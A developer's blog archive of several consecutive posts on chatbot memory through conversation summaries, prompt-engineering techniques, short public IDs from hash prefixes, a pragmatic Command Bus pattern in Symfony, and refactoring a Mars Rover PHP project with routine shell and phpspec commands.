Chatbot: Your name's Loïc
User: I'm a Lead Developer, my tech stack is: PHP, Symfony, PostgreSQL and git
Chatbot: Do you have any specific questions related to your tech stack?
User: I also follow these methodologies: SCRUM, TDD and OOP
Chatbot: Do you have any topics related to those methodologies that you'd like to discuss?
User: What is my name?
Chatbot:
Because of the 5 lines limit, the chat system needs to truncate the augmented prompt before sending it to the LLM. A common solution seems to only keep the latest messages. Which means the LLM would end up only getting the following prompt:
Chatbot: Do you have any specific questions related to your tech stack?
User: I also follow these methodologies: SCRUM, TDD and OOP
Chatbot: Do you have any topics related to those methodologies that you'd like to discuss?
User: What is my name?
Chatbot:
And this is why ChatGPT is not able to answer the expected Your name's Loïc.
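A minimal sketch of that truncation strategy (the line-based limit mirrors the simplified example above; real systems count tokens instead):

```php
<?php

// Keep only the latest lines of the conversation, dropping the oldest ones
// when the prompt exceeds the size limit.
function truncatePrompt(array $lines, int $maxLines): array
{
    return array_slice($lines, -$maxLines);
}

$conversation = [
    'User: Hi, my name is Loïc',
    "Chatbot: Hello Loïc, it's nice to meet you! How can I assist you today?",
    'Chatbot: Do you have any specific questions related to your tech stack?',
    'User: What is my name?',
];

// With a 2-line limit, the introduction (and the name) is lost:
print_r(truncatePrompt($conversation, 2));
```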
Note: at the time of writing this article, ChatGPT's limit is shared between the prompt and the completion:
- for the gpt-3.5-turbo model, the token limit is 4096
- for gpt-4 it's 8192

Before being sent to the LLM, the input text is broken down into tokens: Hi, my name is Loïc is broken down into the following dictionary ['Hi', ',', ' my', ' name', ' is', ' Lo', 'ï', 'c'], which is then converted into the following tokens [17250, 11, 616, 1438, 318, 6706, 26884, 66]. A single word might be broken down into multiple tokens, and tokenisation varies between models. The rule of thumb is to consider that a token is equivalent to 3/4 of a word.
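The 3/4-of-a-word rule of thumb can be turned into a quick estimate (a rough heuristic only; real tokenisation is model-specific):

```php
<?php

// Rough token estimate: tokens ≈ words / 0.75, per the rule of thumb above.
function estimateTokens(string $text): int
{
    return (int) ceil(str_word_count($text) / 0.75);
}

echo estimateTokens('Hi my name is Bob'); // 5 words -> about 7 tokens
```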
So. Where do we go from here? How do we enable Infinite Memory for chatbots, and more broadly LLMs?
One solution would be to periodically summarize parts of the conversation.
The summarization task itself can be done in a separate "summarizing" prompt:
Summarize the following conversation in a short sentence, in the past tense:
User: Hi, my name is Loïc
Chatbot: Hello Loïc, it's nice to meet you! How can I assist you today?
User: What is my name?
Chatbot: Your name is Loïc
Which should result in a completion similar to:
The user introduced themselves as Loïc, and the chatbot confirmed their name when asked.
The augmented prompt would then contain the summaries of older messages, as well as recent ones:
Previously:
The user introduced themselves as Loïc, and the chatbot confirmed their name when asked.
The user discussed their tech stack (PHP, Symfony, PostgreSQL and Git) and methodologies (SCRUM, TDD and OOP) as a Lead Developer, and the chatbot asked if they have any specific questions related to them.
User: What is my name?
Chatbot:
Now the LLM should be able to give a completion equivalent to:
Your name is Loïc. Is there anything else I can help you with related to your tech stack or methodologies as a Lead Developer?
And that's the gist of it!
Augmenting the prompt with recent messages, as well as summaries of related older ones, can allow LLMs to have Infinite Memory!
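Assembled in code, the idea looks something like this (a sketch; the function and parameter names are mine):

```php
<?php

// Build the augmented prompt: summaries of older exchanges first, then the
// recent raw messages, then the new user message to complete.
function buildAugmentedPrompt(array $summaries, array $recentLines, string $userPrompt): string
{
    $parts = [];
    if ([] !== $summaries) {
        $parts[] = "Previously:\n" . implode("\n", $summaries);
    }
    if ([] !== $recentLines) {
        $parts[] = implode("\n", $recentLines);
    }
    $parts[] = "User: {$userPrompt}\nChatbot:";

    return implode("\n", $parts);
}

echo buildAugmentedPrompt(
    ['The user introduced themselves as Loïc.'],
    [],
    'What is my name?',
);
```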
And that's when the "build a pet project" part of my brain started tingling, sometimes I just can't resist the urge to build something to get a better grasp on a concept that's intriguing me...
So I've started to code a small CLI app (with PHP and Symfony of course) to explore the concepts.
There definitely are some challenges and limits to the summarization approach.
First would be how to select the chunks of conversation to summarize... Do we create a new summary:
Next is what summary to include in the prompt:
Which then brings another rabbit hole, namely how to search for relevant summaries:
More on that once I've made some progress on the pet project. Anyway.
All in all, while I haven't found a practical use case for ChatGPT in my day to day developer activity, it still seems worth exploring its potential for generating content. The quest continues.
In my quest to find a use for ChatGPT in my day to day developer activity, I've stumbled upon this online course website: Learn Prompting, an initiative led by Sander Schulhoff, with contributions from Towards AI.
Granted, this doesn't bring me anywhere close to my goal... Yet, this is in stark contrast to all the resources I've found so far, which are usually "hey I tried this hack and it worked", with no explanation as to why.
Let me walk you through the different Prompt Engineering techniques, and why they work, with some academic backing, so we can learn a thing or two.
Note: It was extremely tempting to describe how ChatGPT works, but I didn't want the explanations to detract from the focus of the article (which is academic-backed prompt engineering). I recommend these short articles for detailed explanations:
- GPT 3.5 model
- Everything I (Vicki Boykis) understand about ChatGPT
X-Shot prompting allows Large Language Models to improve their accuracy, on previously unseen data, without the need to update their training parameters, by including examples in the prompt:
Extract the brand, product name and format from this item "Magnum White Chocolate Ice Cream 8 x 110 ml":
* brand: Magnum
* product name: White Chocolate Ice Cream
* format: 8 x 110 ml
Extract the brand, product name and format from this item "Birds Eye Garden Peas, 375g (Frozen)":
* brand: Birds Eye
* product name: Garden Peas
* format: 375g
Extract the brand, product name and format from this item "PG tips 160 Original Tea Bags":
* brand: PG tips
* product name: Original Tea Bags
* format: 160
Extract the brand, product name and format from this item "233g, Golden Eggs Chocolate Egg, Galaxy":
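Such an X-Shot prompt can be assembled from a list of labelled examples; here's a small sketch (the function name is mine):

```php
<?php

// Build an X-Shot prompt: each example is rendered as a solved extraction,
// followed by the new, unsolved item.
function buildXShotPrompt(array $examples, string $newItem): string
{
    $prompt = '';
    foreach ($examples as $item => $fields) {
        $prompt .= "Extract the brand, product name and format from this item \"{$item}\":\n";
        foreach ($fields as $name => $value) {
            $prompt .= "* {$name}: {$value}\n";
        }
    }

    return $prompt . "Extract the brand, product name and format from this item \"{$newItem}\":\n";
}

echo buildXShotPrompt(
    ['Magnum White Chocolate Ice Cream 8 x 110 ml' => [
        'brand' => 'Magnum',
        'product name' => 'White Chocolate Ice Cream',
        'format' => '8 x 110 ml',
    ]],
    '233g, Golden Eggs Chocolate Egg, Galaxy',
);
```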
There's a distinction between Few-Shot, One-Shot and Zero-Shot prompting (referring to how many examples are included in the prompt).
Isn't Zero-Shot prompting just... Prompting? Well X-Shot isn't just about having examples in the prompt, it's mainly about the capability of the model to perform better on new data it wasn't trained on, so we're going to see that "Zero-Shot" term used in conjunction with other techniques.
See also, Kris - All About AI's article: X-Shot Prompting
Few-Shot Chain of Thought prompting allows Large Language Models to perform better on logic based tasks (such as solving arithmetic, commonsense, and symbolic problems) by including in the examples the reasoning steps:
Q: Roger has 5 tennis balls. He buys 2 more cans of tennis balls.
Each can has 3 tennis balls. How many tennis balls does he have now?
A: Roger started with 5 balls. 2 cans of 3 tennis balls each is 6 tennis balls.
5 + 6 = 11. The answer is 11.
Q: The cafeteria had 23 apples. If they use 20 to make lunch and bought 6 more,
how many apples do they have?
Zero-Shot Chain of Thought prompting can also be used to get better results for these tasks, by including in the prompt a request to detail the reasoning steps:
A juggler can juggle 16 balls. Half of the balls are golf balls,
and half of the golf balls are blue. How many blue golf balls are there?
Let's think step by step.
More specifically, ending the prompt with Let's think step by step proved
to provide the best results
(a claim backed by the paper CoT Prompting Elicits Reasoning in LLM).
Generated Knowledge prompting allows Large Language Models to perform better on commonsense reasoning by having a first prompt request the generation of knowledge on a topic, and then incorporating the output in a second prompt that requests to perform the related commonsense task.
Here's the first prompt asking for knowledge generation:
Write 5 facts about test driven development
Then the second prompt which incorporates the output for the first prompt:
Here are 5 facts about TDD:
1. Test-driven development (TDD) is a software development process that emphasizes the creation of automated tests before any code is written. In TDD, developers write a failing test case first, then write code to pass the test, and then refactor the code to improve it.
2. TDD helps to ensure that the code is working correctly by testing it at every step of the development process. By creating tests first, developers can also ensure that their code meets the requirements and specifications of the project.
3. TDD can be used with a variety of programming languages and frameworks, and it is often used in agile development methodologies. It can also be used in combination with other testing techniques, such as behavior-driven development (BDD) and acceptance test-driven development (ATDD).
4. TDD can result in improved code quality, as developers are forced to think more deeply about the design of their code and the potential edge cases that their code may encounter. TDD can also result in faster development times, as bugs are caught early in the development process and can be fixed before they cause more significant issues.
5. TDD is not a silver bullet solution for software development and may not be suitable for all projects or teams. It can require additional time and effort upfront to write tests and ensure that they are passing, and it may require a cultural shift in the development team to fully adopt the TDD methodology.
With TDD, can I first write code that fails, then write a test and finally refactor the code to make the test pass?
Note: I've seen this as also being referred to as Chain Prompting.
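The two-step flow can be sketched as a simple chain. The `ask` function below is a hypothetical stand-in for a real LLM API call (stubbed here so the sketch runs on its own):

```python
def ask(prompt: str) -> str:
    """Stand-in for a real LLM call; replace with an actual API client."""
    return f"[model reply to: {prompt[:40]}...]"

def generated_knowledge(knowledge_request: str, question: str) -> str:
    # Step 1: ask the model to generate knowledge about the topic.
    knowledge = ask(knowledge_request)
    # Step 2: prepend that generated knowledge to the actual question.
    second_prompt = f"{knowledge}\n\n{question}"
    return ask(second_prompt)

answer = generated_knowledge(
    "Write 5 facts about test driven development",
    "With TDD, can I first write code that fails, then write a test "
    "and finally refactor the code to make the test pass?",
)
print(answer)
```

The point is only the chaining: the second prompt is built from the first reply.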
The following prompt engineering techniques are proven by studies to improve the output quality of Large Language Models:
- Let's think step by step

All in all, while I haven't found a practical use case for ChatGPT in my day to day developer activity, it still seems worth exploring its potential for generating content. The quest continues.
In my quest to find a use for ChatGPT in my day to day developer activity, I've stumbled upon this video: ChatGPT Prompt Engineering: How to Write a Story, by Kris - All About AI.
Granted, story writing is a bit irrelevant for what I'm looking for. Yet the way the messages sent to ChatGPT (aka "prompts") were crafted, proved quite interesting!
Let me walk you through it, with some added references so we can learn a thing or two.
After opening a new conversation, the First Prompt (or user message) sent to ChatGPT is used to prime it:
You are a {Genre} author.
Your task is to write {Genre} stories in a vivid and intriguing language.
Answer with "..." if you acknowledge.
Don't write anything yet.
Genre = Sci-Fi
This is a variation of the You are [job], you have been [doing thing] for 20 years prompt,
which helps ChatGPT narrow down the context that it's going to use to generate its replies.
Reference: "Give ChatGPT an identity" section from How To Use ChatGPT: Advanced Prompt Engineering
Interestingly, it uses a placeholder ({Genre}) and sets its value (Genre = Sci-Fi).
It also makes sure that ChatGPT doesn't generate any reply.
Could this be because ChatGPT will base its next replies on any text it will have already generated in the conversation?
The Second Prompt is used to specify more context for chatGPT:
Title: [Insert story title here]
Setting: [Insert setting details here, including time period, location, and any relevant background information]
Protagonist: [Insert protagonist's name, age, and occupation, as well as a brief description of their personality and motivations]
Fill out the template above for a {Genre} story
Genre = Sci-Fi
The brilliance of this one is that it uses a second kind of placeholder ([Insert story title here]),
one that is intended for ChatGPT to replace (Fill out template above).
If ChatGPT is indeed going to base its next reply on whatever it has already generated earlier in the conversation, then having it repeat the instructions with the added details is simply genius.
The list format might also not be trivial,
as I've seen claims that usage of colons (Title: [insert story title here])
is supposed to help ChatGPT be more specific in its replies too.
Reference: "Prompt 2" chapter from Advanced ChatGPT Prompt Tutorial
While the First and Second prompts were about setting the context, the Third and Fourth ones are finally the calls to action.
Here's the Third Prompt:
Build a story outlines from the factors above:
ChatGPT is going to generate an ordered list based on the context previously given.
Then the Fourth Prompt:
Great, now create story chapters from the outlines above:
ChatGPT is going to reuse its reply for the Third Prompt, and expand on it.
I'm taking note of the use of the word Great,
could its purpose be to give some positive feedback to ChatGPT?
Another thing worth mentioning is the use of the word now,
which I see a lot from prompt engineers,
and I'm not sure whether it's deliberate, to improve ChatGPT's replies.
But most importantly,
I'm wondering how from the factors above is interpreted by ChatGPT:
is it going to consider every message sent in the current conversation,
or is it going to focus on the immediately prior message?
I've personally got a feeling that ChatGPT will focus mainly on its own replies from the conversation.
The usage of a final colon : is especially noteworthy,
I'd be curious to know if this is another hack to help ChatGPT write more focused replies.
The Fifth Prompt is yet another call to action:
Write Chapter 1 in depth and in great detail, in an intriguing writing style:
It asks ChatGPT to reuse its previous reply and expand on it,
but this time only a section of it by referencing the chapter number
(Write Chapter 1)!
The rest of the prompt is a variation of
Write a [length] [content type] on [topic] in the style of [style].
Specifying some constraints such as these helps ChatGPT avoid irrelevant output.
Reference: "Be specific, descriptive and as detailed as possible about the desired context, outcome, length, format, style, etc " section from Best practices for prompt engineering with OpenAI API
In my opinion, the most important piece of advice from that video comes in play when writing the second to tenth chapters:
Write Chapter 2 in depth and in great detail, in an intriguing writing style:
Instead of copying the prompt, pasting it in the input message box, changing the chapter number and then sending it as the Sixth Prompt, the advice we're given is to edit the Fifth Prompt (through ChatGPT's UI), change the number and submit it!
ChatGPT's UI will still allow you to check the previous versions of the prompt, as well as their generated replies, so you don't lose anything here.
But this ties in with the idea that ChatGPT performs better with its immediately prior message, than asking it to expand on a reply it wrote 10 messages earlier.
While the purpose of the video was to write a Sci-Fi story, it helped me learn a lot of Prompt Engineering techniques (the art of crafting messages that will improve ChatGPT replies).
The First Prompt needs to prime ChatGPT for the targeted domain, and make sure that it doesn't reply anything:
You're [JOB].
You have been [DOING JOB] for 20 years.
Your task is now to [TASK].
Answer with "..." if you acknowledge.
Don't write anything yet.
It seems to me that ChatGPT bases its reply on its own immediately prior message, so the Second Prompt needs to make ChatGPT repeat it in its reply, to set up the context for the Third Prompt's reply.
The usage of colons (:) helps ChatGPT to be more specific in its replies,
and it's possible to use placeholders that are going to be replaced
with generated content in ChatGPT reply:
Title: [Insert title]
Setting: [Insert setting details here]
Fill out the template above for a Sci-Fi story
If the prompt is intended to be copy pasted and used in different scenarios, it's possible to use placeholders that act as variables, and to which the value is set further down the prompt:
You are a {Genre} author.
Your task is to write {Genre} stories
Genre = Sci-Fi
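This variable-placeholder style can be reproduced with ordinary string templating. Here's a minimal Python sketch; the convention of parsing a trailing `Genre = Sci-Fi` line is an assumption made for illustration:

```python
def render(template: str) -> str:
    """Split off trailing 'Name = value' lines and substitute {Name} placeholders."""
    body, variables = [], {}
    for line in template.strip().splitlines():
        if "=" in line and line.split("=")[0].strip().istitle():
            name, _, value = line.partition("=")
            variables[name.strip()] = value.strip()
        else:
            body.append(line)
    text = "\n".join(body)
    for name, value in variables.items():
        text = text.replace("{" + name + "}", value)
    return text

prompt = render("""
You are a {Genre} author.
Your task is to write {Genre} stories
Genre = Sci-Fi
""")
print(prompt)
```

When talking to ChatGPT directly, of course, the model performs this substitution itself; the sketch is only useful for reusing the same template across scenarios.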
The Third Prompt is going to be a call to action, that's going to use the Second Prompt's reply for context.
Now, write [length] [content type] on [topic] in the style of [style], using [context] from above:
While we're on the topic of length, it's very important to bear in mind that ChatGPT can only handle 4000 tokens, shared between the prompt you write and the reply it generates, which is approximately 3000 words (when it uses the text-davinci-003 model).
So for example, if your prompt contains 3000 tokens, that only leaves ChatGPT with 1000 tokens for its reply!
Reference: "Important: Prompt Size Matters" chapter from This Will Make You Better than 99% ChatGPT Users
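The budget arithmetic above is simple enough to sketch in a couple of lines (the 4000-token figure is the text-davinci-003 limit quoted above):

```python
TOKEN_LIMIT = 4000  # shared between the prompt and the reply (text-davinci-003)

def reply_budget(prompt_tokens: int) -> int:
    """Tokens left for the model's reply once the prompt is sent."""
    return max(TOKEN_LIMIT - prompt_tokens, 0)

print(reply_budget(3000))  # a 3000-token prompt leaves 1000 tokens for the reply
```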
The Fourth Prompt is going to be a call to action, that's going to use the Third Prompt's reply for context, and so on.
If for some reason the Fifth Prompt needs to use the Third Prompt's reply for context, then we should instead edit directly the Third Prompt, make the required changes, and submit them.
All in all, while I haven't found a practical use case for ChatGPT in my day to day developer activity, it still seems worth exploring its potential for generating content. The quest continues.
In the latter case, an ID needs to be artificially crafted.
Two popular strategies are to use either an auto-incremental ID or a universally unique one; however, when it comes to sharing them publicly, both strategies present some drawbacks.
Resources are given a serial number, starting from 1 and increased by 1 for every new entry added.
This means that the ID of the last resource needs to be known in order to create a new one, so that's usually done by the database itself.
Resources are attributed a 36-character hexadecimal string, which is computed by an algorithm.
A couple of Universally Unique ID (UUID) strategies are available, the main ones being:
Since UUIDs are 36 characters long, and auto-incremental IDs grow longer over time, there might be a need for a shorter ID.
The requirements for a short ID are usually:
A possible compromise is to keep the IDs as they currently are in the system for internal operations, and provide a hash of it for public operations, with the hope that the hash is shorter and more readable than the ID.
As of 2018, the best hashing algorithm is SHA-256, as it generates 256 cryptographically secure bits and hasn't been found to be vulnerable to collision attacks yet.
The drawbacks of hashes are the following:
Following the
Birthday Paradox,
we can calculate when the first collision will happen:
after outputting 2 ** (n / 2) hashes
(with n being the number of output bits).
For SHA-256, that's 340 undecillion (340 282 366 920 938 463 463 374 607 431 768 211 456) hashes before a collision happens.
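The numbers check out in a couple of lines of Python:

```python
n = 256  # SHA-256 output bits
first_collision = 2 ** (n // 2)  # birthday bound: ~2^(n/2) hashes

print(first_collision)
# 340282366920938463463374607431768211456 (340 undecillion)
```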
References:
The Git project uses the hexadecimal representation of SHA-1 hashes to identify each commit.
Since these hashes are quite lengthy (160 bits, 40 hexadecimal characters), Git allows the first few characters to be used as an identifier (at first the first 7, then the first 12, and finally a dynamically incremented length).
The number of hashes a subset covers can be calculated as follows: 16 ** d
(with d being the number of first hexadecimal characters selected).
Using the Birthday Problem formula,
we can estimate that the first collision might happen after
2 ** (n / 2) short hashes have been used
(with n being the number of first bits, which is d * 4,
with d being the number of first hexadecimal characters).
Here's a handy list:
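Such a list can be generated with a few lines of Python; the chosen values of d below are illustrative (7 and 12 are the historical Git defaults mentioned above):

```python
# For the first d hex characters of a hash: the number of distinct short
# hashes (16 ** d), and the birthday-bound estimate of when the first
# collision happens (2 ** (d * 4 / 2), since each hex character is 4 bits).
handy_list = {
    d: {"short_hashes": 16 ** d, "first_collision": 2 ** (d * 4 // 2)}
    for d in (7, 12, 16)
}

for d, row in handy_list.items():
    print(f"{d:2d} chars: {row['short_hashes']} short hashes, "
          f"first collision expected after ~{row['first_collision']}")
```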
References:
At the lowest level, IDs are represented as binary numbers.
To be more human friendly, they can then be converted to a different base:
We can even use a custom base, such as base 62 which would use all 26 English alphabet characters, both lower case and upper case, and all 10 digits.
The bigger the base, the shorter the same number will be represented, so a way to shorten an ID (and that includes a way to shorten a hash) is to represent it in a different base.
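A base-62 conversion can be sketched in a few lines of Python (the alphabet order here, digits then lower case then upper case, is an arbitrary choice):

```python
ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

def to_base62(number: int) -> str:
    """Represent a non-negative integer in base 62, yielding a shorter ID."""
    if number == 0:
        return ALPHABET[0]
    digits = []
    while number > 0:
        number, remainder = divmod(number, 62)
        digits.append(ALPHABET[remainder])
    return "".join(reversed(digits))

print(to_base62(123456789))  # 5 characters instead of 9 decimal digits
```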
While using this approach might seem like a good idea at first (human readable IDs that look like words), it actually brings more trouble (chances to generate bad words in many languages).
References:
Regardless of the type of internal ID used (auto-incremental, UUID, or other), it could still be beneficial to generate from them a short public ID.
A way to do so is to create a SHA-256 hash out of the ID, and then use its first few characters.
The precise number of characters to use can be incremental: it should be bumped up when the number of generated hashes gets close to the estimated first collision.
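The approach can be sketched with Python's hashlib; the 12-character length below is an illustrative starting point, to be bumped as volume grows:

```python
import hashlib

def public_id(internal_id: str, length: int = 12) -> str:
    """Derive a short public ID from an internal ID via SHA-256."""
    digest = hashlib.sha256(internal_id.encode("utf-8")).hexdigest()
    return digest[:length]

print(public_id("42"))  # deterministic: 12 hex characters, same ID every time
```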
See also:
TL;DR: Use Command Bus pattern in your controllers, but drop the bus.
The Command Bus pattern relies on 3 types of classes:
The first one is the Command:
(SubmitNewQuote, AssignReviewers, etc.)

Next is the Command Handler:
Handler

And finally there's a Command Bus interface allowing us to build Middlewares:
Middlewares can do any action we want before and/or after the wrapped Command Bus. They can be nested in a specific order, allowing us a fine grained control over how the Command will be handled.
Command Bus can be described as a routing for the domain: a Command (like a Request) is given to the Command Bus (like a Router) which is going to call the appropriate Command Handler (like a Controller).
We can use Command Bus in our controller: create the Command using the Request's inputs, and then take the code that would be in the Controller and move it in the Command Handler.
This way our Domain logic is decoupled from the Framework. The idea of being able to switch an application to a different framework might seem ludicrous (when does that ever happen?), but the truth is that two major versions of a single framework often feel like two different frameworks (eg symfony1 vs Symfony2), and in some cases that's even true for minor versions (eg Symfony 2.0 vs Symfony 2.1).
The main point of Command Bus is the possibility to create Middlewares, however the same thing could be achieved with a good old Event Dispatcher, so let's ditch the Bus.
The Routing thing should already be done for us by the framework, and it should be true regardless of the framework or version upgrades. So we can safely inject Command Handlers directly in Controllers.
Finally, most of the time applications aren't asynchronous. So when it's not the case it should be OK for the Command Handler to return a value (eg the created or updated resource).
Let's put all this wisdom into practice by creating a Controller allowing us to submit a code to reset a counter.
First we're going to create the Command, it should contain all the input parameters, do a simple validation on it and have an intention revealing name describing the action we'd like to do:
<?php
// File: src/Dharma/Swan/SubmitCode.php;
namespace Dharma\Swan\Code;
class SubmitCode
{
public $code;
/**
* @throws \DomainException If the required "code" parameter is missing
* @throws \DomainException If the "code" parameter is not a string
*/
public function __construct($code)
{
if (null === $code) {
throw new \DomainException(
'Missing required "code" parameter',
422
);
}
if (!is_string($code)) {
throw new \DomainException(
'Invalid "code" parameter: should be a string',
422
);
}
$this->code = (string) $code;
}
}
Note 1: Command class attributes are set in the constructor, and then read in the Command Handler. Since it's never used anywhere else, there's no point creating a getter or setter for it, we can just make those attributes public.
Note 2: Commands are going to check the parameters type, so there's no need to type hint the constructor arguments (we should allow wrong types so we can throw an exception with a helpful message).
Note 3:
DomainException is the PHP standard exception for application errors (eg not found, forbidden, etc). Here we use the code 422, which is the HTTP status code for UNPROCESSABLE ENTITY ("validation failed"). Our advice is to create custom Application Exceptions that extend DomainException and set the right code (eg ValidationFailed with code 422, NotFound with code 404, etc).
The second step is to create the Command Handler. It needs to do more complex validation, and the actual logic associated to the Command's intention:
<?php
// File: src/Dharma/Swan/SubmitCodeHandler.php;
namespace Dharma\Swan;
use Dharma\Swan\Service\CheckCode;
use Dharma\Swan\Service\ResetCounter;
class SubmitCodeHandler
{
private $checkCode;
private $resetCounter;
public function __construct(
CheckCode $checkCode,
ResetCounter $resetCounter
) {
$this->checkCode = $checkCode;
$this->resetCounter = $resetCounter;
}
/**
* @throws \DomainException If the "code" parameter is not a valid code
*/
public function handle(SubmitCode $submitCode): int
{
$this->checkCode->check(
$submitCode->code
);
$newCount = $this->resetCounter->reset();
return $newCount;
}
}
Note 4: Services with descriptive names are injected and used in the Command Handler, so that reading the handle method feels like reading the steps of the current use case.
Note 5: The CheckCode service will throw a 422 exception if the code is invalid (eg if the code is not 4 8 15 16 23 42).
Note 6: We've decided for ResetCounter to return the new count. For an asynchronous application, it wouldn't return anything, and neither would the Command Handler.
Finally we can use the Command and Command Handler in our Controller:
<?php
// File: src/Dharma/Swan/Controller/SubmitCodeController.php;
namespace Dharma\Swan\Controller;
use Dharma\Swan\SubmitCode;
use Dharma\Swan\SubmitCodeHandler;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\Request;
class SubmitCodeController
{
private $submitCodeHandler;
public function __construct(SubmitCodeHandler $submitCodeHandler)
{
$this->submitCodeHandler = $submitCodeHandler;
}
/**
* @throws \DomainException If the required "code" parameter is missing
* @throws \DomainException If the "code" parameter is not a string
* @throws \DomainException If the "code" parameter is not a valid code
*/
public function submitCode(Request $request): Response
{
$newCount = $this->submitCodeHandler->handle(new SubmitCode(
$request->request->get('code')
));
return new Response(json_encode(['counter' => $newCount]), 200, [
'Content-Type' => 'application/json',
]);
}
}
Note 7: Exceptions should be handled by event listeners, those should log important errors and create an appropriate response.
Note 8: Some controllers have more than one action meaning they'd be injected with more than one Command Handler, however only one will be called per Request. Since Symfony 3.3 Service Locators can be injected so that the controller can only access the listed Command Handlers, and only one Command Handler will actually be instantiated. Before Symfony 3.3, the Container should be injected (same effect, but all services are accessible).
Command Bus allows us to decouple our application logic from the framework, protecting us from Backward Compatibility Breaking changes.
However since the Bus can be replaced by Event Listeners, we can simply drop it and inject the Command Handlers directly in Controllers. If our application isn't asynchronous, then Command Handlers should be able to return values.
So our PragmatiClean Command Bus is simply a Command and Command Handler pair for each Use Case in our application (so one pair per Controller action).
For more resources on the Command Bus design pattern, check these links:
- CommandBus by Shawn McCool
- What am I missing with this whole command bus (reddit question)
- A wave of command buses (series) by Matthias Noback
- Avoid the Mud (slides) by Richard Miller
- Messaging Flavours and Form, Command, Model validation and also Functional Foundation for CQRS/ES by Mathias Verraes
- Tactician, a simple Command Bus library for PHP
- Clarified CQRS by Udi Dahan
Also here are some usage examples, with code and everything:
- Mars Rover: an application coded chapter after chapter, using this design pattern
- The Ultimate Developer Guide to Symfony Examples on how to create an API endpoint, a full stack web page and a console command with Symfony and this design pattern
In this new series we'll see how to stop wasting time arguing which one is best and start using both instead.
Clean Code is about writing for the long term, usually by structuring it with the help of Design Patterns and Principles.
The assumption is that everything will change given enough time, be it code or people, and so things should be easy to understand and easy to change.
The opposite of Clean Code would be "taking shortcuts" to get the job done, which causes maintenance to become harder and harder over time.
Pragmatic Code is about writing for the short term, usually by selecting the most simple and quickest way to achieve a task.
The assumption is that things need to be done as quickly as possible, and the simplest solution is always the best.
The opposite of Pragmatic Code would be "over engineering" for the sake of it, which wastes time, makes the code harder to maintain and also makes it less efficient.
As we can see, both schools seem diametrically opposed, hence the heated debates.
But both seem to be making good points, so why not try to adopt both?
Pragmatic Programmers don't resent structured code or even Design Patterns and Principles; what they find aberrant is their overuse and misuse.
Clean Coders don't dislike simple solutions and they don't like spending more time on a task than necessary, what they find abnormal is code that has become too hard to maintain because it grew more and more out of control over time.
So let's develop one universal school of thought that covers both: PragmatiClean. We'll do so by going over the following Design Patterns/Principles and give them a twist:
And to make all this learning applicable, we'll show some Symfony code!
TL;DR: Links I tweeted during 2016
Last year my interests seemed to have been split in three periods:
I've also discovered two inspiring talks, I highly recommend you to watch them:
Apart from that, tons of links, as usual.
Because PHP 7 will not wait any faster for your database/remote/filesystem calls:
We've already developed the first use case about landing the rover on mars, and the second one about driving it. We're now developing the last one, requesting its location:
Mars rover will be requested to give its current location (
x and y coordinates and the orientation).
In this article we're going to move geolocation value objects (Location,
Coordinates and Orientation) into their new package (geolocation):
git checkout 5-location
cd packages/geolocation
Let's move our value objects to their new package:
mkdir -p src/MarsRover/Geolocation spec/MarsRover/Geolocation
mv ../navigation/src/MarsRover/Navigation/{Coordinates,Location,Orientation}.php ./src/MarsRover/Geolocation/
mv ../navigation/spec/MarsRover/Navigation/{Coordinates,Location,Orientation}Spec.php ./spec/MarsRover/Geolocation/
We then need to fix the namespace:
sed -i 's/Navigation/Geolocation/' */MarsRover/Geolocation/*.php
This should allow us to run successfully our tests for this package:
vendor/bin/phpspec run
All Green!
Now let's update the navigation package:
cd ../navigation
In order to find where our Location class is used, we can use the following:
grep -R Location src spec/
We need to fix the use statement in spec/MarsRover/Navigation/LandRoverSpec.php:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Geolocation\Location;
use MarsRover\Geolocation\Orientation;
use PhpSpec\ObjectBehavior;
class LandRoverSpec extends ObjectBehavior
{
const X = 23;
const Y = 42;
const ORIENTATION = Orientation::NORTH;
function it_has_location()
{
$this->beConstructedWith(
self::X,
self::Y,
self::ORIENTATION
);
$location = $this->getLocation();
$location->shouldHaveType(Location::class);
$coordinates = $location->getCoordinates();
$coordinates->getX()->shouldBe(self::X);
$coordinates->getY()->shouldBe(self::Y);
$location->getOrientation()->get()->shouldBe(self::ORIENTATION);
}
}
We can see that we also use Orientation, so we fix it here and we'll do a search later.
Then we need to add use statements in src/MarsRover/Navigation/LandRover.php:
<?php
namespace MarsRover\Navigation;
use MarsRover\Geolocation\{
Coordinates,
Location,
Orientation
};
class LandRover
{
private $location;
public function __construct($x, $y, $orientation)
{
$this->location = new Location(
new Coordinates($x, $y),
new Orientation($orientation)
);
}
public function getLocation() : Location
{
return $this->location;
}
}
We also spot a use of Coordinates, so we fix it here now and we'll do a search later.
All done. Let's search for Coordinates:
grep -R Coordinates src spec
There's nothing we haven't fixed yet, so let's search for Orientation:
grep -R Orientation src spec
It looks like spec/MarsRover/Navigation/LandRoverHandlerSpec.php uses it, so let's fix it:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\EventSourcing\AnEventHappened;
use MarsRover\EventSourcing\Event;
use MarsRover\Navigation\Events;
use MarsRover\EventSourcing\EventStore;
use MarsRover\Navigation\LandRover;
use MarsRover\Geolocation\Orientation;
use PhpSpec\ObjectBehavior;
class LandRoverHandlerSpec extends ObjectBehavior
{
const X = 23;
const Y = 42;
const ORIENTATION = Orientation::NORTH;
const EVENT_NAME = Events::ROVER_LANDED;
const EVENT_DATA = [
'x' => self::X,
'y' => self::Y,
'orientation' => self::ORIENTATION,
];
function it_lands_a_rover_at_given_location(
AnEventHappened $anEventHappened,
Event $roverLanded,
EventStore $eventStore
) {
$this->beConstructedWith($anEventHappened, $eventStore);
$landRover = new LandRover(
self::X,
self::Y,
self::ORIENTATION
);
$anEventHappened->justNow(
self::EVENT_NAME,
self::EVENT_DATA
)->willReturn($roverLanded);
$eventStore->log($roverLanded)->shouldBeCalled();
$this->handle($landRover);
}
}
That should be it for our navigation package. Let's run the tests:
vendor/bin/phpspec run
All Green!
Finally we can use our value objects in our location package:
cd ../location
We can now use Orientation for our constant in spec/MarsRover/Location/LocateRoverHandlerSpec.php,
and also make sure both FindLatestLocation and LocateRoverHandler return a Location
value object:
<?php
namespace spec\MarsRover\Location;
use MarsRover\Geolocation\Coordinates;
use MarsRover\Geolocation\Location;
use MarsRover\Geolocation\Orientation;
use MarsRover\Location\Service\FindLatestLocation;
use PhpSpec\ObjectBehavior;
class LocateRoverHandlerSpec extends ObjectBehavior
{
const X = 23;
